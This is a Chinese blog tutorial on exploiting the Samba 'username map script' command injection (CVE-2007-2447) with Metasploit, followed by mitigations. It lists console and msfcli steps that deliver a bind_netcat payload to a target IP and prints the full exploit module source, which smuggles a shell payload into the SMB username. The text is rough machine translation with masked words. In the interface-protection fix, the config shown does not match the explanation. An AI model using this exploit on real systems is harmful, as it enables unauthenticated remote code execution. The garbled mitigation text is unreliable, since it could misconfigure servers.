最近在学Metasploit×××测试,所以写一下这篇博客,希望能帮助到在学或者遇到了这个漏洞×××的小伙伴们~~

Username map script 是什么?

Username map script是Samba协议的一个漏洞,ID为CVE-2007-2447,属于远程命令注入漏洞,主要影响Samba的3.0.20到3.0.25rc3 版本。

这个bug最初是针对匿名电话进行报告的到SamrChangePassword()MS-RPC功能组合中与“用户名映射脚本”smb.conf选项(不是默认启用)。经过Samba开发人员的进一步调查,结果如下确定问题更广泛和影响远程打印机和文件共享管理。根原因是传递通过MS-RPC提供的未经过滤的用户输入在调用定义的外部脚本时调用/ bin / sh
在smb.conf中。但是,与“用户名映射脚本”不同,漏洞,远程文件和打印机管理脚本需要经过认证的用户会话。

漏洞生命周期

2007年5月7日:漏洞匿名披露到security@samba.org电子邮件列表中。
2007年5月7日:Samba的开发人员Gerald Carter开始响应这个漏洞。
2007年5月9日:Samba的开发者Jeremy Allison发布了补丁,用于iDefense测试。
2007年5月10日:向vendor-sec邮件列表发布通知。
2007年5月14日:公开漏洞信息。

使用Metasploit利用

方式一:通过控制台

#进入metasploit控制台
msfconsole

#选择usermap_script×××模块
use exploit/multi/samba/usermap_script

#选择bind_netcat×××载荷
set payload cmd/unix/bind_netcat

#设置目标地址
set RHOST 10.10.10.254

#设置目标端口
set RPORT 139

#执行×××
exploit

方式二:通过msfcli
msfcli multi/samba/usermap_script PAYLOAD=cmd/unix/bind_netcat RHOST=10.10.10.254 E

源代码

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::SMB::Client

  # For our customized version of session_setup_no_ntlmssp
  CONST = Rex::Proto::SMB::Constants
  CRYPT = Rex::Proto::SMB::Crypt

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Samba "username map script" Command Execution',
      'Description'    => %q{
          This module exploits a command execution vulnerability in Samba
        versions 3.0.20 through 3.0.25rc3 when using the non-default
        "username map script" configuration option. By specifying a username
        containing shell meta characters, attackers can execute arbitrary
        commands.
        No authentication is needed to exploit this vulnerability since
        this option is used to map usernames prior to authentication!
      },
      'Author'         => [ 'jduck' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2007-2447' ],
          [ 'OSVDB', '34700' ],
          [ 'BID', '23972' ],
          [ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=534' ],
          [ 'URL', 'http://samba.org/samba/security/CVE-2007-2447.html' ]
        ],
      'Platform'       => ['unix'],
      'Arch'           => ARCH_CMD,
      'Privileged'     => true, # root or nobody user
      'Payload'        =>
        {
          'Space'    => 1024,
          'DisableNops' => true,
          'Compat'      =>
            {
              'PayloadType' => 'cmd',
              # *_perl and *_ruby work if they are installed
              # mileage may vary from system to system..
            }
        },
      'Targets'        =>
        [
          [ "Automatic", { } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'May 14 2007'))

    register_options(
      [
        Opt::RPORT(139)
      ])
  end

  def exploit

    connect

    # lol?
    username = "/=`nohup " + payload.encoded + "`"
    begin
      simple.client.negotiate(false)
      simple.client.session_setup_no_ntlmssp(username, rand_text(16), datastore['SMBDomain'], false)
    rescue ::Timeout::Error, XCEPT::LoginError
      # nothing, it either worked or it didn't ;)
    end

    handler
  end
end

解决方法

方案一:限制并发连接的数量
当smbd作为守护进程(而不是inetd)启动时,Samba能够限制并发连接的数量。'max smbd processes'smb.conf选项允许管理员定义在任何给定时间点运行的smbd进程的最大数量。客户端连接到服务器的任何进一步尝试都将被拒绝。

方案二:使用基于主机的保护
在许多Samba安装中,最大的威胁来自您的直接网络之外。默认情况下,Samba将接受来自任何主机的连接,这意味着如果您在直接连接到Internet的主机上运行不安全版本的Samba,则可能会特别容易受到×××。
其中在这种情况下,最简单的修复是使用“主机允许”和“主机否认”桑巴smb.conf配置文件中,只允许从主机特定范围的访问您的服务器的选项。一个例子可能是:

hosts allow = 127.0.0.1 192.168.2.0/24 192.168.3.0/24
主机拒绝= 0.0.0.0/0
以上只会允许来自'localhost'(您自己的计算机)和两个专用网络192.168.2和192.168.3的SMB连接。客户端发送第一个数据包后,所有其他连接都将被拒绝连接。拒绝将被标记为“不听名称”错误。

方案三:使用接口保护
默认情况下,Samba将接受它在系统上找到的任何网络接口上的连接。这意味着如果你有一条ISDN线路或PPP连接到互联网,那么Samba将接受这些链路上的连接。这可能不是你想要的。

您可以使用以下选项更改此行为:
hosts allow = 127.0.0.1 192.168.2.0/24 192.168.3.0/24
hosts deny = 0.0.0.0/0
它告诉Samba只监听名称以'eth'开始的接口上的连接,如eth0,eth1,以及名为'lo'的回送接口。您需要使用的名称取决于您使用的操作系统。在上面我使用了Linux上的以太网适配器的通用名称。
如果您使用上述方法,并且有人尝试通过称为'ppp0'的PPP接口与主机建立SMB连接,则它们将获得TCP连接拒绝答复。在这种情况下,根本不会运行Samba代码,因为操作系统被告知不要将连接从该接口传递到任何进程。

方案四:使用防火墙
许多人使用防火墙拒绝访问他们不希望暴露在网络之外的服务。这可能是一个非常好的主意,但我建议将它与上述方法结合使用,以便即使防火墙由于某种原因未处于活动状态而受到保护。

如果您正在设置防火墙,那么您需要知道允许和阻止哪些TCP和UDP端口。Samba使用以下内容:
UDP / 137 - 由nmbd
UDP / 138使用 - 由nmbd使用
TCP / 139 - 由smbd使用
TCP / 445 - 由smbd使用
最后一个很重要,因为许多旧的防火墙设置可能没有意识到,因为近年来这个端口只被添加到协议中。

方案五:使用IPC $共享拒绝
如果上述方法不合适,那么您还可以在最近发现的安全漏洞中使用的IPC $共享上放置更具体的拒绝。这允许您提供对其他共享的访问,同时拒绝可能不可信的主机访问IPC $。

要做到这一点,你可以使用:
[ipc $]
hosts allow = 192.168.115.0/24 127.0.0.1
hosts deny = 0.0.0.0/0
这将告诉Samba,除了列出的两个地方(本地主机和本地子网)外,IPC $连接不能从任何地方被允许。与其他股份的连接仍将被允许。由于IPC $共享是唯一可匿名访问的共享,因此可以为不知道用户名/密码的×××者提供一定程度的保护。
如果你使用这种方法,那么客户端在尝试访问IPC $共享时将被授予“拒绝访问”的回复。这意味着这些客户端将无法浏览共享,也可能无法访问其他一些资源。
我不推荐这种方法,除非由于某种原因不能使用上面列出的其他方法之一。

方案六:升级Samba
个人认为是最好的方法~~~~